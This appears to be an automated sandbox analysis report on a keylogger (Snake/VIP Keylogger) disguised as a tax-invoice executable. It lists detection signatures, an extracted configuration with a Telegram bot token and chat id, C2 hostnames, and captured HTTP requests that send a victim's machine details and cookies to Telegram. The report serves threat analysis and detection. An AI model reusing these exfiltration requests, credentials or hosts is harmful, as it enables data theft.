Windows Analysis Report
(STC) Tax Invoice 25030216_REV.exe

Overview

General Information

Sample name: (STC) Tax Invoice 25030216_REV.exe
Analysis ID: 1651004
MD5: 1f2316cbbb6f340ea45753ea5c889f11
SHA1: 3b49e0d165f9be0ac0443fa75ce4dcd25901dbcf
SHA256: 81f89461fc1feee34ad39a56fb386ed8e65eabe13416a20baa5b7adc6593e138
Tags: exeInvoiceSnakeKeyloggeruser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE", "Chat id": "7128988401"}
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE", "Chat_id": "7128988401", "Version": "4.4"}
Source: RegSvcs.exe.604.2.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendMessage"}
Multi AV Scanner detection for submitted file
Source: (STC) Tax Invoice 25030216_REV.exe ReversingLabs: Detection: 77%
Source: (STC) Tax Invoice 25030216_REV.exe Virustotal: Detection: 73% Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.2%
Sample uses string decryption to hide its real strings
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor: 7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor: 7128988401
Source: 2.2.RegSvcs.exe.400000.0.unpack String decryptor:

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E8445A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C6D1 FindFirstFileW,FindClose, 0_2_00E8C6D1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E8C75C
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8EF95
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8F0F2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8F3F3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E837EF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E83B12
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8BCBC
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BFAA9h 2_2_027BF804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 027BF2EDh 2_2_027BF3BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407EB5h 2_2_05407B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409280h 2_2_05408FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400FF1h 2_2_05400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540E81Fh 2_2_0540E550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540C82Fh 2_2_0540C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540A83Fh 2_2_0540A570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540ECAFh 2_2_0540E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540CCBFh 2_2_0540C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054018A1h 2_2_054015F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05401449h 2_2_054011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054002E9h 2_2_05400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540BF0Fh 2_2_0540BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409F1Fh 2_2_05409C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05403709h 2_2_05403460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054032B1h 2_2_05403008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054062D9h 2_2_05406030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540DEFFh 2_2_0540DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540E38Fh 2_2_0540E0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540C39Fh 2_2_0540C0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540A3AFh 2_2_0540A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400B99h 2_2_054008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05406733h 2_2_05406488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05400741h 2_2_05400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402A01h 2_2_05402758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054025A9h 2_2_05402300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540F5CFh 2_2_0540F300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540D5DFh 2_2_0540D310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054079C9h 2_2_05407720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540B5EFh 2_2_0540B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054055D1h 2_2_05405328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05409A8Fh 2_2_054097C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405E81h 2_2_05405BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405A29h 2_2_05405780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540FA5Fh 2_2_0540F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540DA6Fh 2_2_0540D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402E59h 2_2_05402BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540BA7Fh 2_2_0540B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05401CF9h 2_2_05401A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407119h 2_2_05406E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540F13Fh 2_2_0540EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05404D21h 2_2_05404A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540ACCFh 2_2_0540AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05406CC1h 2_2_05406A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 054048C9h 2_2_05404620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05407571h 2_2_054072C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05405179h 2_2_05404ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540D14Fh 2_2_0540CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0540B15Fh 2_2_0540AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05402151h 2_2_05401EA8

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49712 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49714 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2029/03/2025%20/%2014:12:19%0D%0ACountry%20Name:%20United%20States%0D%0A[%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6f1bd0b1aa93Host: api.telegram.orgContent-Length: 741
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49693 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49699 -> 104.21.112.1:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49696 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00E922EE
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2029/03/2025%20/%2014:12:19%0D%0ACountry%20Name:%20United%20States%0D%0A[%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7332888932:AAEd0xO46FUg-eZu8OorYiVnZ_y4D9P2pCE/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6f1bd0b1aa93Host: api.telegram.orgContent-Length: 741
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 28 Mar 2025 09:40:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.orgd
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
